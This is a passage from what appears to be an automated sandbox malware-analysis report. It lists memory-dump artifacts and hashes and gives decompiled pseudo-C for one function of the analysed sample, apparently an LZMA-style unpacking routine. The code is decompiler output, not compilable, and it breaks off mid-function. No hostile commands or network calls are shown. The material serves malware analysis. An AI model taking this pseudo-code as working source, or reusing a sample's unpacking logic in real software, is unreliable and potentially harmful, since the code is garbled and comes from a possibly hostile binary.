                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: ErrorFindMode$CloseFileFirst
                • String ID: C:\
                • API String ID: 2885216544-3404278061
                • Opcode ID: 863b284ad5a92f7a1a8a6f5dd5e6c1c033b4ab17d74f49b76f5d02ce1b12dfb3
                • Instruction ID: a6a8c167051aeed94988b7bc9a417df50a67df51a882c0690b661480960f0059
                • Opcode Fuzzy Hash: 863b284ad5a92f7a1a8a6f5dd5e6c1c033b4ab17d74f49b76f5d02ce1b12dfb3
                • Instruction Fuzzy Hash: A8E08632B0455067C20017B46D4CE073658DF85721F208533B240B62D0D5B55C118BFA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406083 Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 653 406083-406088 654 4060f9-406117 653->654 655 40608a-4060b9 653->655 658 4066ef-406704 654->658 656 4060c0-4060c4 655->656 657 4060bb-4060be 655->657 660 4060c6-4060ca 656->660 661 4060cc 656->661 659 4060d0-4060d3 657->659 662 406706-40671c 658->662 663 40671e-406734 658->663 665 4060f1-4060f4 659->665 666 4060d5-4060de 659->666 660->659 661->659 664 406737-40673e 662->664 663->664 667 406740-406744 664->667 668 406765-406771 664->668 671 4062c6-4062e4 665->671 669 4060e0 666->669 670 4060e3-4060ef 666->670 674 4068f3-4068fd 667->674 675 40674a-406762 667->675 681 405f07-405f10 668->681 669->670 677 406159-406187 670->677 672 4062e6-4062fa 671->672 673 4062fc-40630e 671->673 680 406311-40631b 672->680 673->680 682 406909-40691c 674->682 675->668 678 4061a3-4061bd 677->678 679 406189-4061a1 677->679 683 4061c0-4061ca 678->683 679->683 687 40631d 680->687 688 4062be-4062c4 680->688 685 405f16 681->685 686 40691e 681->686 684 406921-406925 682->684 690 4061d0 683->690 691 406141-406147 683->691 692 405fc2-405fc6 685->692 693 406032-406036 685->693 694 405f1d-405f21 685->694 695 40605d-40607e 685->695 686->684 696 406299-40629d 687->696 697 40642e-40643b 687->697 688->671 689 406262-40626c 688->689 698 4068b1-4068bb 689->698 699 406272-406294 689->699 712 406126-40613e 690->712 713 40688d-406897 690->713 700 4061fa-406200 691->700 701 40614d-406153 691->701 705 406872-40687c 692->705 706 405fcc-405fe5 692->706 709 406881-40688b 693->709 710 40603c-406050 693->710 694->682 708 405f27-405f34 694->708 695->658 703 4062a3-4062bb 696->703 704 4068a5-4068af 696->704 697->681 702 40648a-406499 697->702 698->682 699->697 714 40625e 700->714 716 406202-406220 700->716 701->677 701->714 702->658 703->688 704->682 705->682 715 405fe8-405fec 706->715 708->686 711 405f3a-405f80 708->711 709->682 717 406053-40605b 710->717 721 405f82-405f86 711->721 722 405fa8-405faa 711->722 712->691 713->682 714->689 715->692 718 405fee-405ff4 715->718 719 406222-406236 716->719 720 406238-40624a 716->720 717->693 717->695 727 405ff6-405ffd 718->727 728 40601e-406030 718->728 729 40624d-406257 719->729 720->729 723 405f91-405f9f GlobalAlloc 721->723 724 405f88-405f8b GlobalFree 721->724 725 405fb8-405fc0 722->725 726 405fac-405fb6 722->726 723->686 733 405fa5 723->733 724->723 725->715 726->725 726->726 730 406008-406018 GlobalAlloc 727->730 731 405fff-406002 GlobalFree 727->731 728->717 729->700 732 406259 729->732 730->686 730->728 731->730 735 406899-4068a3 732->735 736 4061df-4061f7 732->736 733->722 735->682 736->700
                C-Code - Quality: 98%
                			E00406083() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406926))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
